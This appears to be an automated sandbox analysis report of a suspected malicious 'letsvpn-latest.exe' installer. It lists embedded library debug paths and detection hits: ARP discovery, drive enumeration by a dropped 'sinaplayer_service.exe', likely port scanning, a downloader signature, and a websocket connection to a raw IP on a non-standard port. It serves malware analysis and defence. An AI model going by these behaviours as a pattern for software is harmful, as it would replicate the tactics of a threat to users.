              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TextWriterTraceListener\4.0.2.0\System.Diagnostics.TextWriterTraceListener.pdb source: letsvpn-latest.exe, 00000013.00000003.2412446400.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdb source: letsvpn-latest.exe, 00000013.00000003.2498550743.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.IsolatedStorage\4.0.2.0\System.IO.IsolatedStorage.pdb source: letsvpn-latest.exe, 00000013.00000003.2424061182.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: letsvpn-latest.exe, 00000013.00000003.2501368760.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdb source: letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Extract: Mono.Cecil.Pdb.dll... 100% source: letsvpn-latest.exe, 00000013.00000003.2376519913.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2480493118.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2537165268.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2551809584.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2421961932.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2441334701.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2518546129.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2471571110.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2527610213.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2417070007.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2451895859.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2478052167.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2474012912.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457960734.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2420484632.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000002.2830202123.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2453367162.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2410871875.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2448548860.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2470923319.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2387968776.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2417838624.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2488461135.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375693525.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2410190709.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2389683427.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2541088623.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.23
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.X509Certificates\4.1.2.0\System.Security.Cryptography.X509Certificates.pdb source: letsvpn-latest.exe, 00000013.00000003.2473661260.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Expressions\4.1.2.0\System.Linq.Expressions.pdb source: letsvpn-latest.exe, 00000013.00000003.2435858420.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb source: letsvpn-latest.exe, 00000013.00000003.2470389956.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdb source: letsvpn-latest.exe, 00000013.00000003.2379177568.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdb source: letsvpn-latest.exe, 00000013.00000003.2359617621.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2474107011.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet\obj\Release\DeltaCompressionDotNet.pdb source: letsvpn-latest.exe, 00000013.00000003.2328342525.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdbX)r) d)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2444933089.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netfx\System.Buffers.pdb source: letsvpn-latest.exe, 00000013.00000003.2388837865.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdbT)n) `)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2471020373.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdbSHA256, source: letsvpn-latest.exe, 00000013.00000003.2351921276.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3935799668.000000002F832000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2486397887.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb<(V( H(_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2388106062.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2479437408.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb source: letsvpn-latest.exe, 00000013.00000003.2411045465.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2481269690.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb* source: letsvpn-latest.exe, 00000013.00000003.2506430141.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdbSHA256,C+U7 source: letsvpn-latest.exe, 00000013.00000003.2469739574.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\SuperSocket.ClientEngine\obj\Release\SuperSocket.ClientEngine.pdbR source: letsvpn-latest.exe, 00000013.00000003.2387260703.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Queryable\4.0.1.0\System.Linq.Queryable.pdb source: letsvpn-latest.exe, 00000013.00000003.2437133707.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.2777728440.0000000005B62000.00000002.00000001.01000000.0000001D.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlDocument\4.0.3.0\System.Xml.XmlDocument.pdb source: letsvpn-latest.exe, 00000013.00000003.2502768386.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdb source: letsvpn-latest.exe, 00000013.00000003.2507016219.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Thread\4.0.2.0\System.Threading.Thread.pdb source: letsvpn-latest.exe, 00000013.00000003.2489862982.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdb source: letsvpn-latest.exe, 00000013.00000003.2389768364.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdb source: letsvpn-latest.exe, 00000013.00000003.2410292995.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2360771712.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdb source: letsvpn-latest.exe, 00000013.00000003.2441430774.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Claims\4.0.3.0\System.Security.Claims.pdb source: letsvpn-latest.exe, 00000013.00000003.2467995068.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding\4.0.11.0\System.Text.Encoding.pdb source: letsvpn-latest.exe, 00000013.00000003.2484002109.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb source: letsvpn-latest.exe, 00000013.00000003.2382726468.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.SqlClient/net461-Windows_NT-Release/System.Data.SqlClient.pdb source: letsvpn-latest.exe, 00000013.00000003.2406644681.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdb source: letsvpn-latest.exe, 00000013.00000003.2364198304.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdb source: letsvpn-latest.exe, 00000013.00000003.2471668940.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensions\obj\Release\SQLiteNetExtensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2377902690.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netfx\System.ValueTuple.pdb source: letsvpn-latest.exe, 00000013.00000003.2497867835.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdbp( source: letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Primitives\4.0.3.0\System.IO.FileSystem.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2422053301.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdb source: letsvpn-latest.exe, 00000013.00000003.2351037678.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdbH source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 0000001C.00000002.2683090826.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001C.00000000.2681003659.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001E.00000000.2683431431.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001E.00000002.2728411628.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 00000024.00000002.2736525094.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 00000024.00000000.2729197986.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb]W source: letsvpn-latest.exe, 00000013.00000003.2420064156.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdb source: letsvpn-latest.exe, 00000013.00000003.2363516673.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdb source: letsvpn-latest.exe, 00000013.00000003.2444933089.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Extensions\4.1.2.0\System.Runtime.Extensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2455636991.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Net.Sockets/netfx\System.Net.Sockets.pdb source: letsvpn-latest.exe, 00000013.00000003.2446092448.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections\4.0.11.0\System.Collections.pdb source: letsvpn-latest.exe, 00000013.00000003.2392116822.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets\4.0.2.0\System.Net.WebSockets.pdb source: letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2355870263.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb$.>. 0._CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2411809176.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: letsvpn-latest.exe, 00000013.00000003.2461351463.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.MemoryMappedFiles\4.0.2.0\System.IO.MemoryMappedFiles.pdb source: letsvpn-latest.exe, 00000013.00000003.2424521311.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization.Calendars\4.0.3.0\System.Globalization.Calendars.pdb source: letsvpn-latest.exe, 00000013.00000003.2417185734.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdb source: letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdb source: letsvpn-latest.exe, 00000013.00000003.2408789957.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdbSHA256X7 source: letsvpn-latest.exe, 00000013.00000003.2352489250.0000000002830000.00000004.00000020.00020000.00000000.sdmp

              Spreading

              barindex
              Performs a network lookup / discovery via ARP
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: z:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: x:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: v:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: t:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: r:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: p:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: n:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: l:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: j:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: h:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: f:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: b:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: y:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: w:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: u:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: s:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: q:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: o:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: m:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: k:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: i:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: g:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: e:Jump to behavior
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeFile opened: c:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile opened: [:Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CEB97 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,__fstat64,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,17_2_6C5CEB97
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CC41C _mbsdec,_mbscmp,_mbscmp,_strdup,strlen,_calloc_crt,__cftof,strcpy_s,_mbsicmp,_invoke_watson,_malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,17_2_6C5CC41C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CE748 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FindClose,_errno,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,17_2_6C5CE748
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CC385 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,17_2_6C5CC385
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CDCF7 _wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,17_2_6C5CDCF7
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C565C91 _wstat64i32,_wcspbrk,towlower,FindFirstFileExW,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,_getdrive,GetLastError,GetLastError,_wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,GetDriveTypeW,free,free,_wsopen_s,__fstat64i32,_close,_errno,__dosmaperr,FindClose,__dosmaperr,FindClose,17_2_6C565C91
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CDF35 _wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,17_2_6C5CDF35
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CD86F _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,17_2_6C5CD86F
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CDA9B _wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,17_2_6C5CDA9B
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CF00C _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FindClose,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,17_2_6C5CF00C
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,19_2_00405C4D
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_0040689E FindFirstFileW,FindClose,19_2_0040689E
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_00402930 FindFirstFileW,19_2_00402930
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A10D0 GetCurrentProcess,GetProcAddress,FindFirstFileW,28_2_00007FF7132A10D0
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A1110 FindFirstFileW,28_2_00007FF7132A1110
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A71EC GetWindowsDirectoryW,FindFirstFileW,__iob_func,__iob_func,__iob_func,FindNextFileW,FindClose,28_2_00007FF7132A71EC
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00854318 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose,std::ios_base::_Ios_base_dtor,53_2_00854318
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00865490 FindFirstFileExW,53_2_00865490
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 4x nop then push esi17_2_6C5F90B4

              Networking

              barindex
              Connects to many ports of the same IP (likely port scanning)
              Source: global trafficTCP traffic: 8.217.212.245 ports 1,2,15628,5,6,8
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 15628 -> 49725
              Yara detected Generic Downloader
              Source: Yara matchFile source: C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dll, type: DROPPED
              Source: Yara matchFile source: C:\Program Files (x86)\letsvpn\Update.exe, type: DROPPED
              Source: global trafficTCP traffic: 192.168.2.5:49725 -> 8.217.212.245:15628
              Source: global trafficTCP traffic: 192.168.2.5:49873 -> 8.8.8.8:53
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: EHoDnRGHRnGJKgiBCKlZTSJBaSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2 HTTP/1.1Host: ws-ap1.pusher.comUpgrade: websocketConnection: UpgradeSec-WebSocket-Version: 13Sec-WebSocket-Key: YTViMmFmNmQtNjcxNi00Ng==Origin: ws://ws-ap1.pusher.com
              Source: Joe Sandbox ViewIP Address: 183.60.146.66 183.60.146.66
              Source: Joe Sandbox ViewIP Address: 103.235.46.96 103.235.46.96
              Source: Joe Sandbox ViewIP Address: 103.235.46.96 103.235.46.96
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
